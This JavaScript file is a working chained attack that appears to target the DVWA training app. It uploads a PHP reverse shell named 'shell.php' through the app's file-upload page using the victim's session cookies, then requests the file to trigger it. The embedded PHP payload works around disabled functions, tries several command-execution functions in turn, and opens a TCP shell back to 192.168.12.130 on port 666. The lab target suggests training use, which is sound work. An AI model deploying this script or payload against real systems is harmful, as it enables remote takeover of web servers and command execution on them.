var target = document.location.host;

function uploadAllTheThings(){
	
	//embed the reverse shell
	var phpKode = "/*<?php /**/";
	phpKode += "      @error_reporting(0);";
	phpKode += "      @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);";
	phpKode += "      $dis=@ini_get('disable_functions');";
	phpKode += "      if(!empty($dis)){";
	phpKode += "        $dis=preg_replace('/[, ]+/', ',', $dis);";
	phpKode += "        $dis=explode(',', $dis);";
	phpKode += "        $dis=array_map('trim', $dis);";
	phpKode += "      }else{";
	phpKode += "        $dis=array();";
	phpKode += "      }";
	phpKode += "      ";
	phpKode += "    $ipaddr='192.168.12.130';";
	phpKode += "    $port=666;";
	phpKode += "";
	phpKode += "    if(!function_exists('zStLLhK')){";
	phpKode += "      function zStLLhK($c){";
	phpKode += "        global $dis;";
	phpKode += "        ";
	phpKode += "      if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {";
	phpKode += '        $c=$c." 2>&1\n";';
	phpKode += "      }";
	phpKode += "      $pVmxQ='is_callable';";
	phpKode += "      $otflAl='in_array';";
	phpKode += "      ";
	phpKode += "      if($pVmxQ('passthru')and!$otflAl('passthru',$dis)){";
	phpKode += "        ob_start();";
	phpKode += "        passthru($c);";
	phpKode += "        $o=ob_get_contents();";
	phpKode += "        ob_end_clean();";
	phpKode += "      }else";
	phpKode += "      if($pVmxQ('popen')and!$otflAl('popen',$dis)){";
	phpKode += "        $fp=popen($c,'r');";
	phpKode += "        $o=NULL;";
	phpKode += "        if(is_resource($fp)){";
	phpKode += "          while(!feof($fp)){";
	phpKode += "            $o.=fread($fp,1024);";
	phpKode += "          }";
	phpKode += "        }";
	phpKode += "        @pclose($fp);";
	phpKode += "      }else";
	phpKode += "      if($pVmxQ('proc_open')and!$otflAl('proc_open',$dis)){";
	phpKode += "        $handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);";
	phpKode += "        $o=NULL;";
	phpKode += "        while(!feof($pipes[1])){";
	phpKode += "          $o.=fread($pipes[1],1024);";
	phpKode += "        }";
	phpKode += "        @proc_close($handle);";
	phpKode += "      }else";
	phpKode += "      if($pVmxQ('system')and!$otflAl('system',$dis)){";
	phpKode += "        ob_start();";
	phpKode += "        system($c);";
	phpKode += "        $o=ob_get_contents();";
	phpKode += "        ob_end_clean();";
	phpKode += "      }else";
	phpKode += "      if($pVmxQ('exec')and!$otflAl('exec',$dis)){";
	phpKode += "        $o=array();";
	phpKode += "        exec($c,$o);";
	phpKode += "        $o=join(chr(10),$o).chr(10);";
	phpKode += "      }else";
	phpKode += "      if($pVmxQ('shell_exec')and!$otflAl('shell_exec',$dis)){";
	phpKode += "        $o=shell_exec($c);";
	phpKode += "      }else";
	phpKode += "      {";
	phpKode += "        $o=0;";
	phpKode += "      }";
	phpKode += "    ";
	phpKode += "        return $o;";
	phpKode += "      }";
	phpKode += "    }";
	phpKode += "    $nofuncs='no exec functions';";
	phpKode += "    if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){";
	phpKode += '      $s=@fsockopen("tcp://192.168.12.130",$port);';
	phpKode += "      while($c=fread($s,2048)){";
	phpKode += "        $out = '';";
	phpKode += "        if(substr($c,0,3) == 'cd '){";
	phpKode += "          chdir(substr($c,3,-1));";
	phpKode += "        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {";
	phpKode += "          break;";
	phpKode += "        }else{";
	phpKode += "          $out=zStLLhK(substr($c,0,-1));";
	phpKode += "          if($out===false){";
	phpKode += "            fwrite($s,$nofuncs);";
	phpKode += "            break;";
	phpKode += "          }";
	phpKode += "        }";
	phpKode += "        fwrite($s,$out);";
	phpKode += "      }";
	phpKode += "      fclose($s);";
	phpKode += "    }else{";
	phpKode += "      $s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);";
	phpKode += "      @socket_connect($s,$ipaddr,$port);";
	phpKode += '      @socket_write($s,"socket_create");';
	phpKode += "      while($c=@socket_read($s,2048)){";
	phpKode += "        $out = '';";
	phpKode += "        if(substr($c,0,3) == 'cd '){";
	phpKode += "          chdir(substr($c,3,-1));";
	phpKode += "        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {";
	phpKode += "          break;";
	phpKode += "        }else{";
	phpKode += "          $out=zStLLhK(substr($c,0,-1));";
	phpKode += "          if($out===false){";
	phpKode += "            @socket_write($s,$nofuncs);";
	phpKode += "            break;";
	phpKode += "          }";
	phpKode += "        }";
	phpKode += "        @socket_write($s,$out,strlen($out));";
	phpKode += "      }";
	phpKode += "      @socket_close($s);";
	phpKode += "    }";
	var filesize = phpKode.length;
	var boundary = "---------------------------202296024516769857302017729256";
	var uri = "http://" + target + "/dvwa/vulnerabilities/upload/";
	xhr = new XMLHttpRequest();
	xhr.open("POST", uri, true);
	xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary);
	xhr.withCredentials = "true";
	var body = "";
	body += "--" + boundary + "\r\n";
	body += 'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n100000\r\n';
	body += "--" + boundary + "\r\n";
	body += 'Content-Disposition: form-data; name="uploaded"; filename="shell.php"\r\n';
	body += "Content-Type: application/x-php\r\n\r\n";
	body += phpKode + "\r\n";
	body += "--" + boundary + "\r\n";
	body += 'Content-Disposition: form-data; name="Upload"\r\n\r\n';
	body += "Upload\r\n";
	body += "--" + boundary + "--"
	xhr.send(body);
	return true;
}

function getShell(){
	var xhttp = new XMLHttpRequest();
	xhttp.open("GET", "http://" + target + "/dvwa/hackable/uploads/shell.php", true);
	xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	xhttp.send();
}

uploadAllTheThings();
setTimeout("getShell()", 1000);
